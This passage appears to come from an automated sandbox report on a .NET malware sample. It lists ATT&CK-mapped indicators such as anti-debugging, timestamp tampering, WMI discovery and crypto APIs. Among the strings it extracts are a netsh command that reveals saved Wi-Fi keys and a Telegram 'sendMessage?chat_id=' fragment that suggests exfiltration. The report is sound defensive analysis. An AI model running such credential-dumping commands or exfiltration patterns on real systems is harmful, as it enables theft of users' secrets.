\"DeriveBytes\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"Rfc2898DeriveBytes\" (Indicator: \"Rfc2898DeriveBytes\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"CryptoStream\" (Indicator: \"CryptoStream\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"SymmetricAlgorithm\" (Indicator: \"SymmetricAlgorithm\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"DeriveBytes\" (Indicator: \"DeriveBytes\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"CryptoStreamMode\" (Indicator: \"CryptoStream\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"cAesGcm\" (Indicator: \"Aes\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"cAesGcm\" (Indicator: \"AesGcm\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"CryptographicException\" (Indicator: \"CryptographicException\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"MD5CryptoServiceProvider\" (Indicator: \"MD5CryptoServiceProvider\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"Aes256\" (Indicator: \"Aes\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"AesCryptoServiceProvider\" (Indicator: \"Aes\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"AesCryptoServiceProvider\" (Indicator: \"AesCryptoServiceProvider\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"HMACSHA256\" (Indicator: \"HMAC\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"HMACSHA256\" (Indicator: \"HMACSHA256\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to \"SHA256Managed\" (Indicator: \"SHA256Managed\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n file/memory contains long string with (Indicator: \"Aes\"; Source: \"00000000-00001916.00000000.130655.02DF0000.00000004.mdmp, 00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n file/memory contains long string with (Indicator: \"Oid\"; Source: \"00000000-00001916.00000000.130655.02DF0000.00000004.mdmp, 00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n file/memory contains long string with (Indicator: \"RC2\"; Source: \"00000000-00001916.00000000.130655.02DF0000.00000004.mdmp, 00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n file/memory contains long string with (Indicator: \"Aes\"; Source: \"00000000-00001916.00000001.131430.00D52000.00000020.mdmp\")\n file/memory contains long string with (Indicator: \"Oid\"; Source: \"00000000-00001916.00000001.131430.00D52000.00000020.mdmp\")\n file/memory contains long string with (Indicator: \"RC2\"; Source: \"00000000-00001916.00000001.131430.00D52000.00000020.mdmp\")\n Found reference to \"AsymmetricAlgorithm\" (Indicator: \"AsymmetricAlgorithm\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to \"RSACryptoServiceProvider\" (Indicator: \"RSACryptoServiceProvider\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to \"CryptoConfig\" (Indicator: \"CryptoConfig\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-409", "type": 2, "relevance": 1, "name": "Contains ability to set file time (API string)", "description": "Found reference to API \"SetCreationTime\" (Indicator: \"SetCreationTime\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"SetLastWriteTime\" (Indicator: \"SetLastWriteTime\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"SetLastAccessTime\" (Indicator: \"SetLastAccessTime\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"SetCreationTime\" (Indicator: \"SetCreationTime\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"SetLastWriteTime\" (Indicator: \"SetLastWriteTime\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"SetLastAccessTime\" (Indicator: \"SetLastAccessTime\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"SetCreationTime\" (Indicator: \"SetCreationTime\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"SetLastWriteTime\" (Indicator: \"SetLastWriteTime\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"SetLastAccessTime\" (Indicator: \"SetLastAccessTime\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "memorydump-8", "type": 20, "relevance": 1, "name": "Found PE header in memory", "description": "Found PE header \"MZ\" - Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-115", "relevance": 1, "name": "Dotnet code contains potential unpacker", "description": "Observed function \"System.Load\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-116", "relevance": 1, "name": "Contains ability to decompress content at runtime", "description": "Observed function \"System.IO.Compression.ZipFile\" in \"577.exe\"\n Observed function \"System.IO.Compression.GZipStream\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1560.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560/002"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-107", "relevance": 1, "name": "Contains ability to load content into memory (Dotnet)", "description": "Observed namespace \"System.IO.MemoryStream\" and TypeReference \".ctor\" in \"577.exe\"\n Observed namespace \"System.IO.MemoryStream\" and TypeReference \"ToArray\" in \"577.exe\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"PtrToStructure\" in \"577.exe\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"SizeOf\" in \"577.exe\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"ReadIntPtr\" in \"577.exe\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"PtrToStringUni\" in \"577.exe\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"ReadByte\" in \"577.exe\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"ReadInt16\" in \"577.exe\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"ReadInt32\" in \"577.exe\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"FreeHGlobal\" in \"577.exe\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"AllocHGlobal\" in \"577.exe\"\n Observed namespace \"System.Runtime.InteropServices.Marshal\" and TypeReference \"Copy\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "static-134", "relevance": 1, "name": "Dotnet file contains encryption/decryption functions", "description": "Observed namespace \"System.Security.Cryptography\" and MemberReference \"CreateDecryptor\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "string-183", "type": 2, "relevance": 1, "name": "Contains ability to check debugger is running (API string)", "description": "Found reference to API \"CheckRemoteDebuggerPresent\" (Indicator: \"CheckRemoteDebuggerPresent\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "file/memory contains long string with (Indicator: \"sendmessage\"; File: \"577.exe\")\n Found reference to API \"SendMessage\" (Indicator: \"sendmessage\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"sendMessage?chat_id=\" (Indicator: \"sendmessage\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"SendMessage\" (Indicator: \"sendmessage\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"sendMessageChannelCache\" (Indicator: \"sendmessage\"; Source: \"00000000-00005100.00000000.131007.01A60000.00000004.mdmp\")\n Found reference to API \"System.ServiceModel.Activities.Configuration.SendMessageChannelCacheElement, System.ServiceModel.Activities, Version=<IPv4>, Culture=neutral, PublicKeyToken=31bf3856ad364e35\" (Indicator: \"sendmessage\"; Source: \"00000000-00005100.00000000.131007.01A60000.00000004.mdmp\")\n Found reference to API \"sendMessage?chat_id=\" (Indicator: \"sendmessage\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"SendMessage\" (Indicator: \"sendmessage\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-359", "type": 2, "relevance": 1, "name": "Contains ability to retrieve system configuration", "description": "Found string \"SystemInfo\" (Indicator: \"systeminfo\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"SystemInfo\" (Indicator: \"systeminfo\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"SystemInfo\" (Indicator: \"systeminfo\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-143", "type": 2, "relevance": 1, "name": "Contains ability to retrieve system language (API string)", "description": "Found reference to API \"GetKeyboardLayout\" (Indicator: \"GetKeyboardLayout\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetKeyboardLayout\" (Indicator: \"GetKeyboardLayout\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetKeyboardLayout\" (Indicator: \"GetKeyboardLayout\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-249", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file time (API string)", "description": "Found reference to API \"GetCreationTime\" (Indicator: \"GetCreationTime\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetCreationTime\" (Indicator: \"GetCreationTime\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetCreationTime\" (Indicator: \"GetCreationTime\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetActiveWindowTitle\" (Indicator: \"GetActiveWindowTitle\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetActiveWindowTitle\" (Indicator: \"GetActiveWindow\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetWindowText\" (Indicator: \"GetWindowText\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetActiveWindowTitle\" (Indicator: \"GetActiveWindowTitle\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetActiveWindowTitle\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetWindowText\" (Indicator: \"GetWindowText\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"GetForegroundWindow\" (Indicator: \"GetForegroundWindow\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetActiveWindowTitle\" (Indicator: \"GetActiveWindowTitle\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetActiveWindowTitle\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"GetWindowText\" (Indicator: \"GetWindowText\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-688", "type": 2, "relevance": 1, "name": "Able to find string content in a file", "description": "Found string \"/C chcp 65001 && netsh wlan show profile | findstr All\" (File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"=clear | findstr Key\" (File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"C chcp 65001 && netsh wlan show profile | findstr All\" (Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"key=clear | findstr Key\" (Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"C chcp 65001 && netsh wlan show profile | findstr All\" (Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"key=clear | findstr Key\" (Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-659", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using API string", "description": "Found string \"NtQuerySystemInformation\" (Indicator: \"NtQuerySystemInformation\"; Source: \"00000000-00005100-00000C29-1064646762\")", "origin": "File/Memory", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-433", "type": 2, "relevance": 1, "name": "Contains ability to execute a WMI query", "description": "Found string \"SELECT * FROM win32_operatingsystem\" (Indicator: \"select * from \"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"SELECT * FROM win32_operatingsystem\" (Indicator: \"select * from \"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-351", "type": 2, "relevance": 1, "name": "Found registry location string related to processor", "description": "Observed string: \"HARDWARE\\Description\\System\\CentralProcessor\\0\" (Indicator: \"hardware\\description\\system\\centralprocessor\") in Source: 00000000-00005100.00000001.132927.00352000.00000020.mdmp", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-513", "type": 2, "relevance": 1, "name": "References to WMI query strings used for process discovery", "description": "Found string \"Select ProcessorId From Win32_processor\" (Indicator: \" Win32_Process\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" Win32_Process\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"elect ProcessorId From Win32_processor\" (Indicator: \" Win32_Process\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"ELECT * FROM Win32_Processor\" (Indicator: \" Win32_Process\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"ELECT ExecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" Win32_Process\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found string \"elect ProcessorId From Win32_processor\" (Indicator: \" Win32_Process\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ELECT * FROM Win32_Processor\" (Indicator: \" Win32_Process\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found string \"ELECT ExecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" Win32_Process\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00001916)\n \"577.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005100)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000d00bb000e0200000000000000000000086d490000000000200000000000000000000000804a4b00f8694900186b4900f89c4b00c06e49000000000060f6410000000000bcf8410095e13f779e9b1700feffffffff2b43779a2a437764c58075b69f4377000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c58075f89c4b0064c5807500000000 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000049000000000074014900000000000100000014000000500149001500000080a34c000000000015000000000000001400000000000000000000000000000000000000000000000300000380524c008d2f00a200000000000000000000000080000000000000008d2f00a280a34c000100000000000000020000000c000000308b4c00308b4c002b8b4c0000000000000000000000490000000001e0f130000000000068f3300095e13f77a6951700feffffff435c43775059437794000000a00000002a8b4c00288b4c00940000009cf33000fdfef3750000000018000000ce4763f8 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006491f464000000006491f464000000003cf130009f4840776691f464000000005cf13000000000006691f46460f130004da33d7500000000000000005cf130006491f4640000000000000000040000008cf130000fa33d756491f464020000000000000000000000080000006491f464ffffffff0100008002000000dcf1300042a23d75e9fd0000 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000192d00345c00000020b74c00c400490008001400230000000000490000000000086d4900f4f830000c0000003801490000000000c04b4b00f8694900106b4900d8484c00f06d4900020000000000000048000000f8f8300074f830002c48e86400004900000000004b48e8648b1a65f6010000002c8d3e650000000080ab4c007bab4c0000000000b0f8300060173765ffffffff4b48e864aa48e864000049000000000040000000bcf83000e543e864a0c14b00e848e864431a65f6010000002c8d3e6500000000cb00000002000000e4f83000a0fb3865ffffffffe848e864 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006b002000310000000000192d00345c00000020b74c00c400490008001400230000000000490000000000086d4900f4f830000c0000003801490000000000c04b4b00f8694900106b4900d8484c00f06d4900020000000000000048000000f8f8300074f830002c48e86400004900000000004b48e8648b1a65f63f87f4648b1a65f6010000002c8d3e6500000000dcf8300090f8300028763465ffffffff3f87f4645d87f464631a65f6010000002c8d3e6500000000dcf83000b8f8300028773465ffffffff5d87f4647b87f4643b1a65f6010000002c8d3e6500000000dcf83000 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004c000100010010f73000e4f63000e4f63000245944770000000040f730000cb7066510f73000060000005cf730000c87407700000000020000005cf73000626f437734874077d270647714d53e6572c6f3750000000001000100060000000000000008d53e6598ab4c000000000050de3e6500000000bacb2bccb616f34c8990d74c2e8af500d270647700f7300000000000e4f8300095e13f77369b1700feffffff34874077c4b6066540960665a0c14b00fcb606650100000098f73000d9b606651cd53e6501000000a0c14b00bccef375000000000000000000000000c4f83000 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000018000000de4663f8c386096ba80530008cf43000f8f8300060b4096bc23b5893feffffff58f430007b92086b08f43000fc68f464fc68f4649492086b8cf43000 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000049000000000074014900000000000100000014000000500149001500000008d24c0000000000150000000000000014000000000000000000000000000000000000000000000002000002d09a4c00bc2900950000000000000000000000008000000000000000bc29009508d24c000100000000000000020000000c000000308b4c00308b4c002b8b4c0000000000000000000000490000000001c8f2300000000000e4f8300095e13f77a6951700feffffff435c43775059437794000000a00000002a8b4c00288b4c00940000006cf43000fdfef3750000000018000000d64663f8 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000d2000000d20000000c000000a8974e0001000000020000000200000010000000d4263e6501000000383d3e650100000050f03000e0ef3000de44e864b8904d0010f030009f44e864b844e864ef1265f658d94b0050f030000100000000000000000000002cf030001ce33765ffffffffb844e8647d44e864c71265f658d94b0038894e00010000008a41ee64871265f658d94b0078ad4c0000000000739fed648f1265f658d94b0078ad4c0000000000383d3e6500000000e1a7ed640000000058d94b00 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000ffffffff60ef3000000000000000000044ef30005cef30000100000000000000020000000000000000000000b4ef3000bb36ee648001000004000000009007000000630000000000e936ee644b0d65f6020000001cf03000000000004da03d757c010000acef300094ef30001800000005000000009007000000000000900700020000001cf0300000000000c0ef3000b0eaee64800063000000000000900700d8ef300015eeee6480006300000063000000000000900700f8ef300007efee648000630000006300000000000090070060a94e00000000005cf03000e3ecee64 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000004010000040100000c000000306e4f0001000000020000000200000010000000d4263e6501000000383d3e65010000007cd030000cd03000de44e864b8904d003cd030009f44e864b844e864c33265f6d8dd4b007cd0300001000000000000000000000058d030001ce33765ffffffffb844e8647d44e8649b3265f6d8dd4b00e0b94f00010000008a41ee645b3265f6d8dd4b0058af4c0000000000739fed64633265f6d8dd4b0058af4c0000000000383d3e6500000000e1a7ed6400000000d8dd4b00 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000ca000000ca0000000c000000183a4f0001000000020000000200000010000000d4263e6501000000383d3e650100000008ce300098cd3000de44e864b8904d00c8cd30009f44e864b844e864372f65f658de4b0008ce3000010000000000000000000000e4cd30001ce33765ffffffffb844e8647d44e8640f2f65f658de4b00d87d4f00010000008a41ee64cf2c65f658de4b00f8ae4c0000000000739fed64d72c65f658de4b00f8ae4c0000000000383d3e6500000000e1a7ed640000000058de4b00 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000005000300750002b0750000000000000000000000049000000000114d030000000000078dd300095e13f77a6951700feffffff435c437750594377aa000000b80000002a075000280750009cd13000d4d53000000000000000000000000000000000000000000000000000a0100000000049001c5c427760d83d75ffffffff170000004cd1300024000000030000003cd6300068db3000d4d530008600000078d1300096ed437752075000a06a1975860000009cd13000d4d530000000000086008800a06a19759cd13000916c197552075000a06a1975a06a19750cd6300002020000 (UID: 00000000-00001916)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00001916)\n \"577.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000009d00150200000000000000000000000000000000000014009800150200000000000000000000b06c420000000000200000000000000000000000284a4400a0694200c06a4200d0994400686e42000000000084f7780000000000e0f9780095e13f7787801700feffffffff2b43779a2a437764c58075b69f4377000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c58075d099440064c58075 (UID: 00000000-00005100)\n \"577.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005100)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", 